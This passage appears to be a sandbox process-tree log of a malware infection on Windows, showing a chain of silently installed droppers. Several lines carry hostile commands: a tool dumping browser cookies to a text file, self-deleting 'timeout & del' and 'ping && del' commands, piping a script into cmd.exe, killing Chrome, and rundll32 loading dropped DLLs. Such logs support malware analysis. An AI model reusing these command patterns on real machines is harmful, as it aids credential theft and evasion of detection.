C:\Users\Admin\AppData\Roaming\CE40.tmp.exe"C:\Users\Admin\AppData\Roaming\CE40.tmp.exe"5⤵PID:2596
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\CE40.tmp.exe6⤵PID:6564
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:2788
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:5888
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:5936
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:6404
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:6864
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7888
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:1836
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2328
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4372
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4940
-
C:\Users\Admin\AppData\Local\Temp\is-R6QTC.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-R6QTC.tmp\Setup3310.tmp" /SL5="$50310,138429,56832,C:\Users\Admin\AppData\Local\Temp\425vi1sqwz0\Setup3310.exe" /Verysilent /subid=5771⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\is-V9KER.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V9KER.tmp\Setup.exe" /Verysilent2⤵PID:5164
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:5216
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1556
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7072
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:5852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 9484⤵
- Program crash
PID:7920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 10044⤵
- Program crash
PID:7624
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 10084⤵
- Program crash
PID:4420
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 11484⤵
- Program crash
PID:4632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 11884⤵
- Program crash
PID:7612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 12044⤵
- Program crash
PID:1368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 15364⤵
- Program crash
PID:5080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 15804⤵
- Program crash
PID:5364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 17604⤵
- Program crash
PID:7648
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 16764⤵
- Program crash
PID:7524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 17364⤵
- Program crash
PID:6952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 17564⤵
- Program crash
PID:5416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 17284⤵
- Program crash
PID:4360
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:5212
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\is-V31CS.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-V31CS.tmp\LabPicV3.tmp" /SL5="$3040C,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:5040
-
C:\Users\Admin\AppData\Local\Temp\is-O21JJ.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-O21JJ.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:6584
-
C:\Program Files\Windows Sidebar\UCVGOACNJS\prolab.exe"C:\Program Files\Windows Sidebar\UCVGOACNJS\prolab.exe" /VERYSILENT6⤵PID:6192
-
C:\Users\Admin\AppData\Local\Temp\is-AASN5.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-AASN5.tmp\prolab.tmp" /SL5="$503DE,575243,216576,C:\Program Files\Windows Sidebar\UCVGOACNJS\prolab.exe" /VERYSILENT7⤵PID:6988
-
-
-
C:\Users\Admin\AppData\Local\Temp\9f-6b122-aed-6978b-0883aff8150c5\Tilaeshimycy.exe"C:\Users\Admin\AppData\Local\Temp\9f-6b122-aed-6978b-0883aff8150c5\Tilaeshimycy.exe"6⤵PID:6936
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 21327⤵PID:7664
-
-
-
C:\Users\Admin\AppData\Local\Temp\32-12344-58e-92daa-bcd7c06aaaaf4\Wydaefonaro.exe"C:\Users\Admin\AppData\Local\Temp\32-12344-58e-92daa-bcd7c06aaaaf4\Wydaefonaro.exe"6⤵PID:7028
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\effsrtma.xiv\md6_6ydj.exe & exit7⤵PID:7272
-
C:\Users\Admin\AppData\Local\Temp\effsrtma.xiv\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\effsrtma.xiv\md6_6ydj.exe8⤵PID:7804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pdcjdssp.s3w\askinstall31.exe & exit7⤵PID:7900
-
C:\Users\Admin\AppData\Local\Temp\pdcjdssp.s3w\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\pdcjdssp.s3w\askinstall31.exe8⤵PID:8164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mjj01cms.lgd\toolspab1.exe & exit7⤵PID:7452
-
C:\Users\Admin\AppData\Local\Temp\mjj01cms.lgd\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\mjj01cms.lgd\toolspab1.exe8⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\mjj01cms.lgd\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\mjj01cms.lgd\toolspab1.exe9⤵PID:556
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"3⤵PID:5948
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:7152
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:5252
-
C:\Users\Admin\AppData\Local\Temp\KQ4D3KIHVR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KQ4D3KIHVR\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵PID:6748
-
C:\Users\Admin\AppData\Local\Temp\KQ4D3KIHVR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KQ4D3KIHVR\multitimer.exe" 1 3.1617436231.60681e473e86a 1035⤵PID:5244
-
C:\Users\Admin\AppData\Local\Temp\KQ4D3KIHVR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KQ4D3KIHVR\multitimer.exe" 2 3.1617436231.60681e473e86a6⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\2q1sj3dv4wb\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\2q1sj3dv4wb\cpyrix.exe" /VERYSILENT7⤵PID:6640
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:5924
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"9⤵PID:4476
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub9⤵PID:4692
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe10⤵PID:4492
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:7464
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"9⤵PID:7180
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4eyf2hpfeat\5b4sphftdta.exe"C:\Users\Admin\AppData\Local\Temp\4eyf2hpfeat\5b4sphftdta.exe" /ustwo INSTALL7⤵PID:2516
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "5b4sphftdta.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\4eyf2hpfeat\5b4sphftdta.exe" & exit8⤵PID:5272
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "5b4sphftdta.exe" /f9⤵
- Kills process with taskkill
PID:1132
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vkkqppgi4db\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vkkqppgi4db\vpn.exe" /silent /subid=4827⤵PID:5496
-
C:\Users\Admin\AppData\Local\Temp\is-27SP2.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-27SP2.tmp\vpn.tmp" /SL5="$20294,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vkkqppgi4db\vpn.exe" /silent /subid=4828⤵PID:4520
-
-
-
C:\Users\Admin\AppData\Local\Temp\crc00ibwkfg\app.exe"C:\Users\Admin\AppData\Local\Temp\crc00ibwkfg\app.exe" /8-237⤵PID:4892
-
-
C:\Users\Admin\AppData\Local\Temp\d4ulepqnyp3\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\d4ulepqnyp3\Setup3310.exe" /Verysilent /subid=5777⤵PID:6296
-
C:\Users\Admin\AppData\Local\Temp\is-65CEK.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-65CEK.tmp\Setup3310.tmp" /SL5="$402AC,138429,56832,C:\Users\Admin\AppData\Local\Temp\d4ulepqnyp3\Setup3310.exe" /Verysilent /subid=5778⤵PID:7212
-
C:\Users\Admin\AppData\Local\Temp\is-GIM9E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GIM9E.tmp\Setup.exe" /Verysilent9⤵PID:3396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rrmoile0cne\vict.exe"C:\Users\Admin\AppData\Local\Temp\rrmoile0cne\vict.exe" /VERYSILENT /id=5357⤵PID:7320
-
C:\Users\Admin\AppData\Local\Temp\is-PN93R.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-PN93R.tmp\vict.tmp" /SL5="$70194,870426,780800,C:\Users\Admin\AppData\Local\Temp\rrmoile0cne\vict.exe" /VERYSILENT /id=5358⤵PID:7416
-
C:\Users\Admin\AppData\Local\Temp\is-V7UOM.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-V7UOM.tmp\win1host.exe" 5359⤵PID:8004
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\P5JL1KE34N\setups.exe"C:\Users\Admin\AppData\Local\Temp\P5JL1KE34N\setups.exe" ll4⤵PID:6804
-
C:\Users\Admin\AppData\Local\Temp\is-QH3EJ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-QH3EJ.tmp\setups.tmp" /SL5="$303D0,635399,250368,C:\Users\Admin\AppData\Local\Temp\P5JL1KE34N\setups.exe" ll5⤵PID:6884
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:5428
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:5292
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:6216
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵PID:7092
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:5624
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:6308
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵PID:5996
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\is-EDHON.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-EDHON.tmp\lylal220.tmp" /SL5="$30406,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵PID:5344
-
C:\Users\Admin\AppData\Local\Temp\is-R914C.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-R914C.tmp\Microsoft.exe" /S /UID=lylal2205⤵PID:6648
-
C:\Program Files\Windows Photo Viewer\HQGQHUWCRC\irecord.exe"C:\Program Files\Windows Photo Viewer\HQGQHUWCRC\irecord.exe" /VERYSILENT6⤵PID:6516
-
C:\Users\Admin\AppData\Local\Temp\is-N4ABM.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-N4ABM.tmp\irecord.tmp" /SL5="$2027C,6265333,408064,C:\Program Files\Windows Photo Viewer\HQGQHUWCRC\irecord.exe" /VERYSILENT7⤵PID:6996
-
-
-
C:\Users\Admin\AppData\Local\Temp\bf-3d257-2cf-2f3ac-80b235378a571\Hegushycaegy.exe"C:\Users\Admin\AppData\Local\Temp\bf-3d257-2cf-2f3ac-80b235378a571\Hegushycaegy.exe"6⤵PID:5676
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g4zvkknm.ak4\md6_6ydj.exe & exit7⤵PID:412
-
C:\Users\Admin\AppData\Local\Temp\g4zvkknm.ak4\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\g4zvkknm.ak4\md6_6ydj.exe8⤵PID:7704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ik1x1ph.545\askinstall31.exe & exit7⤵PID:7768
-
C:\Users\Admin\AppData\Local\Temp\3ik1x1ph.545\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\3ik1x1ph.545\askinstall31.exe8⤵PID:8056
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:3572
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:7596
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgcss1cn.j24\toolspab1.exe & exit7⤵PID:8172
-
C:\Users\Admin\AppData\Local\Temp\pgcss1cn.j24\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\pgcss1cn.j24\toolspab1.exe8⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\pgcss1cn.j24\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\pgcss1cn.j24\toolspab1.exe9⤵PID:6108
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\b0-14771-f39-f418f-857c640c9c971\Jajyrovijae.exe"C:\Users\Admin\AppData\Local\Temp\b0-14771-f39-f418f-857c640c9c971\Jajyrovijae.exe"6⤵PID:6980
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 22087⤵PID:7980
-
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5508
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F1AB7885090D6A4452DEFD6EFBA8D07B C2⤵PID:5352
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6353713DE5D509B1DDBFB16739B8CD312⤵PID:6268
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:2472
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:6696
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5952
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:5736
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5940973d-2e37-5542-a9be-dc72bbb2db63}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:2556
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:4744
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:4412
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:4420
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\1cb890e60c064e9593ac769a39e3c217 /t 0 /p 24721⤵PID:7228
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:4800